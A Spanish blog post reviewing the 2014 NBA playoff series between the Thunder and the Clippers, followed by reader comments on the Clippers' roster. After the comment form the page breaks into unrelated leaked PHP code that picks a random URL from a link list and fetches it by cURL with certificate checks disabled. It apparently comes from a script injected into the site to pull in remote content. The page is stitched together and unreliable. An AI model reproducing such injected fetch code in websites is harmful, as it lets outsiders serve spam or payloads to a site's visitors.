Resumen Thunder 4 – Clippers 2

19 de May de 2014 por TheDeerHunter

La serie más igualada y apasionante de segunda ronda. Para algunos la final del Oeste prevista al principio de curso. Eso sí, no se ha llegado al séptimo choque como esperábamos y nos queda un ligero poso de decepción. El listón de los anteriores cruces era demasiado alto. Hemos podido constatar parte de la potencia de estas dos escuadras, pero también se les ha visto alguno de los defectos que les llevó a poner en peligro su presencia en esta eliminatoria.

Caso Sterling a parte, algo no ha terminado de cuadrar en estos Clippers a la hora de meter la cabeza entre los candidatos. Se nos antoja una oportunidad perdida, porque con el permiso de los Spurs daba la impresión que contaban con una plantilla superior. Apenas se ha notado. Exceptuando a Paul y Griffin, cercanos a su nivel habitual, al resto ha sufrido el mal de altura. Han bajado significativamente sus prestaciones respecto a la regular y los últimos flamantes fichajes de Granger, Turkoglu y Davis han resultado completamente inútiles. Finalmente habrá que reconocer que ciertas críticas que se arrojaron al principio de curso iban bien encaminadas, porque lo que verdaderamente les ha matado y lo que estuvo ya a punto de hacerlo antes ha sido una defensa mediocre. No hemos apreciado la esperada marca de Doc Rivers en este sentido. Los Thunder se han ido por encima de los 107 puntos por partido, 61 de ellos de la parejita estrella, frente a los que no han existido soluciones. A estas alturas es una sentencia de muerte. Inevitable.

La victoria de los Thunder tampoco ha sido fácil. Al final todo se reduce al milagro del quinto partido, así como un buen número de decisiones arbitrales cuestionables a favor. Para bien y para mal hemos vuelta a ver el “balones a Durant o Westbrook”, grandes minutadas para ellos y fiarlo todo a los contraataques. Situación crítica a corto plazo por culpa de la (¿supuesta?) lesión de Ibaka. La defensa tampoco ha deslumbrado especialmente en ningún momento estos playoffs.

MVP: Incontenible la dupla estelar de Oklahoma. 61 puntos, 15.5 rebotes, 14 asistencias, 3 robos y 1 tapón entre los dos. ¿Suficiente para aspirar al anillo?

El rookie/La sorpresa: Steven Adams no es el nuevo bailarín de clacket del Cotton Club, pero el tipo suda la camiseta. En esta serie ya ha pasado en importancia a Kedrick Perkins y no se puede decir que el equipo lo haya notado negativamente en defensa. También ha sido más utilizado que otros pesos pesados como Sefolosha, Butler, Collison, Fisher… 5 puntos, 6 rebotes y 1 tapón en 21 minutos de juego.

La decepción: Lamentable serie del mejor 6º hombre del año. Jamal Crawford a lanzado con tan sólo un 35% de acierto. Auténtico hara-kiri teniendo en cuenta que lo hacía sólo dos o tres veces menos que Griffin y Paul. Volvemos a destacar el bajón de hombres clave como Collison y DeAndre, a pesar de lo decisivo del primero en la última victoria del equipo. Mención especial a Granger y Davis… nivel de ex-jugadores en activo.

El mayor esfuerzo en vano: Nada que reprochar a la dupla estelar de los Clippers. Griffin y Paul han podido hacer poco más. Quizá algunos errores puntuales, pero se han dejado la piel para ganar y no ha sido suficiente.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    mmm no pude ver todos los juegos de la serie, peroi en uno, no recuerdo mal, vi un gran nivel de Davis, sobretodo en la primera mitad

      Citar

  2. Esteban dice:
    #2

    Los clippers estan en una especie de limbo, siendo algo superiores a los Warriors, Rockets, Grizlies y Portland, pero desde mi punto siendo inferiores (y en buena medida) al Thunder y Spurs

    Hoy por hoy parecen un contendiente pero solo eso, me cuesta imaginarlos eliminando en una serie a siete juegos a alguno de estos dos

    con muchos millones comprometidos en Griffin, CP3, jordan, Reddick y Dudley y unos despachos muy convulsionados, no veo que puedan mejorar mucho su equipo de aquí al futuro

      Citar

  3. Vader dice:
    #3

    Suena Paul Pierce para los Clippers. Sería un refuerzo de lujo en una de sus posiciones más débiles. Los años no pasan en balde pero Pierce les puede dar 20-25 minutos de mucha calidad. Les hace falta algún interior más de garantías en la rotación.

    Si se soluciona el problema Sterling y se mueven bien en los despachos puede ser un aspirante al titulo, Chris Paul es muy bueno y Griffin y Jordan han mejorado mucho con Doc Rivers.

    Saludos

      Citar

  4. Esteban dice:
    #4

    Vader:
    Suena Paul Pierce para los Clippers. Sería un refuerzo de lujo en una de sus posiciones más débiles. Los años no pasan en balde pero Pierce les puede dar 20-25 minutos de mucha calidad. Les hace falta algún interior más de garantías en la rotación.

    Si se soluciona el problema Sterling y se mueven bien en los despachos puede ser un aspirante al titulo, Chris Paul es muy bueno y Griffin y Jordan han mejorado mucho con Doc Rivers.

    Saludos

    no comparto, Pierce esta demasiado lento y viejo para el juego rapido y vivaz de los Clippers, sin dudas no encajaria

    los Clippers deberan seguir con Barnes en el puesto de 3

      Citar

  5. Vader dice:
    #5

    Esteban: no comparto, Pierce esta demasiado lento y viejo para el juego rapido y vivaz de los Clippers, sin dudasno encajaria

    los Clippers deberan seguir con Barnes en el puesto de 3

    No creo que quieran prescindir de Barnes, ni salir con Pierce de titular. Creo que usarian a Pierce igual que Mavericks usa a Carter. Saliendo desde el banco y aportando minutos de calidad segun el encuentro y rival.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>